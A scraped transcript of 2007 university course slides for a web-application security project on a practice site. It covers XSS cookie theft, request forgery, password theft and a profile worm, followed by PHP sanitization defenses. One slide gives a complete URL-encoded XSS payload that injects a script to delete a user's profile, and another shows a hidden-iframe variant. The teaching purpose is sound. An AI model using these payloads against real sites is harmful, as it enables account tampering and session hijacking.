Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

Published byCrystal Caldwell Modified over 9 years ago

Similar presentations

Presentation on theme: "1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007."— Presentation transcript:

1 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007

2 2 Part 1 Attacks

3 3 Overview Explore several attack types Requires both effectiveness and stealth Learn: How an attacker can evade sanitization Consequences of an exploit JavaScript Very basic CSS

4 4 A: Cookie Theft Use URL encoding Could hijack session C: Password Theft Evade sanitization Handle DOM events email Attacks B: Request Forgery Navigate browser Use iframes, forms D: Profile Worm Persistent attack Replicates zoobar.org link email zoobar.org form badguy.com stanford.edu redirect badguy.com zoobar.org form zoobar.org

5 5 Sanitization Works differently depending on context Attack: Break out with ' " Defense: escape quotes with \ attackstring Attack: Launch script with Attack: Close off parent tag Defense: escape angle brackets eval( attackstring ) Attack: Do whatever you want Defense: Don’t do that

6 6 Example: Profile Deleter Malicious hyperlink deletes profile of user who clicks it Only works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log out Might appear in another user’s profile Uses vulnerability in users.php from Attack A Constructs profile deletion form and submits it ???

7 7 Find vulnerability Site reflects query parameter in input field Link can include anything we want here

8 8 Copy form data View source to find form fields Create copycat form with our modifications

9 9 Close previous, Button click triggers form submit URL encode http://scriptasylum.com/tutorials/encdec/encode-decode.html http://www.dommermuth-1.com/protosite/experiments/encode/index.html

10 10 Debugging Check error It didn’t work. Open JavaScript console Undefined  No properties! Two forms with same name

11 11 Now with correct form Fixed version

12 12 Profile deleted Final Test users.php replaced with index.php http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E

13 13 Post form into hidden iframe … Open page with form in hidden iframe … document.myframe.contentDocument.forms[0].profile_update.value =“”; Stealthier approaches

14 14 Part 2 Defenses

15 15 Goals Learn: How easy it is to make mistakes That even simple code can be hard to secure Techniques for appropriate input validation PHP Very basic SQL Little programming knowledge can be a dangerous thing

16 16 File structure index.php users.php transfer.php login.php includes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template) db/ zoobar/  Person.txt (must be writable by web server) Includes /usr/class/cs155/projects/pp2/txt-db-api/… Only edit these files

17 17 txt-db-api Third-party text file database library Data can be int, string, and autoincrement Need to escape strings: \' \" \\ Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);

18 18 A: Cookie Theft C: Password Theft Defenses to Part 1 B: Request Forgery Attack D: Profile Worm

19 19 PHP Sanitization Techniques addslashes(string) Prepends backslash to ' " \ Already done by magic_quotes_gpc Inverse: stripslashes(string) htmlspecialchars(string [, quote_style]) Converts & " to HTML entities Use ENT_QUOTES to change ' to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag properties preg_replace(pattern, replacement, subject) More info: http://php.net

20 20 More XSS hunting Look for untrusted input used as output Note sanitization already applied to each variable Form data has magic_quotes_gpc, db data does not Sanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to problems No credit for solving non-goals: SQL injection, etc.

21 21 Good luck!

Download ppt "1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007."

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.

Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.

TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Martin Kruliš 2. 4. 2015 by Martin Kruliš (v1.0)1.

Martin Kruliš by Martin Kruliš (v1.0)1.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.

8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
PHP Security.

PHP Security.

Similar presentations

Ads by Google